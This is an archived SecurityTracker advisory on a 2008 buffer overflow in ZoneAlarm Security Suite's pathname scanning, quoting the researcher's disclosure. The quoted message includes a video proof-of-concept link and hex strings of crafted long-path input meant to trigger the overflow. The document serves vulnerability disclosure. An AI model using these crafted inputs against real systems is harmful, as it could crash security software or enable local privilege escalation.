SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Firewall)  >   ZoneAlarm Vendors:   Check Point
ZoneAlarm Buffer Overflow in Processing Pathnames Lets Local Users Gain Elevated Privileges
SecurityTracker Alert ID:  1020859
SecurityTracker URL:  http://securitytracker.com/id/1020859
CVE Reference:   CVE-2008-7009   (Links to External Site)
Updated:  Aug 20 2009
Original Entry Date:  Sep 12 2008
Impact:   Execution of arbitrary code via local system, User access via local system
Exploit Included:  Yes  
Version(s): 7.0.483.000
Description:   A vulnerability was reported in ZoneAlarm. A local user can obtain elevated privileges on the target system.

A local user can create a specially crafted pathname that, when scanned by ZoneAlarm, will trigger a buffer overflow and execute arbitrary code on the target system.

A demonstration exploit video is available at:

http://www.fileden.com/files/2008/9/11/2091525/zonealarm.swf

Juan Pablo Lopez Yacubian reported this vulnerability.

Impact:   A local user can obtain elevated privileges on the target system.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.checkpoint.com/ (Links to External Site)
Cause:   Boundary error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  ZoneAlarm Security Suite buffer overflow


Application: ZoneAlarm Security Suite
OS: Windows Xp (All patches a day)
------------------------------------------------------
1 - Description
2 - Vulnerability
3 - POC/EXPLOIT
------------------------------------------------------
Description

The zonealarm is a known firewall,
which in the version "security suite" brings some tools as an antivirus, antispam and so on.

	
Details of the version



------------------------------------------------------
Vulnerability

The vulnerability is caused because the program can not analyze very long paths.
This causes a buffer overflow with the possibility of execution of code.

The flaw could be exploited by malware to leave without protection to the system for instance.
	
------------------------------------------------------
POC/EXPLOIT

	
Here you can view a video proof of concept

http://www.fileden.com/files/2008/9/11/2091525/zonealarm.swf


Strings



HEX : b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41
 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 b7 20 85 20 20 41 41 41
 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7
 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 b7 20 85 20 20 41 20 b7 20 85 20 20 41 41 41 41 41
 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41


AAAA

HEX: 85 85 85 85 85 85 85 85 85 85 85 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 85 85 85 85 41 41 41 41 41
 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41




------------------------------------------------------
Juan Pablo Lopez Yacubian

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC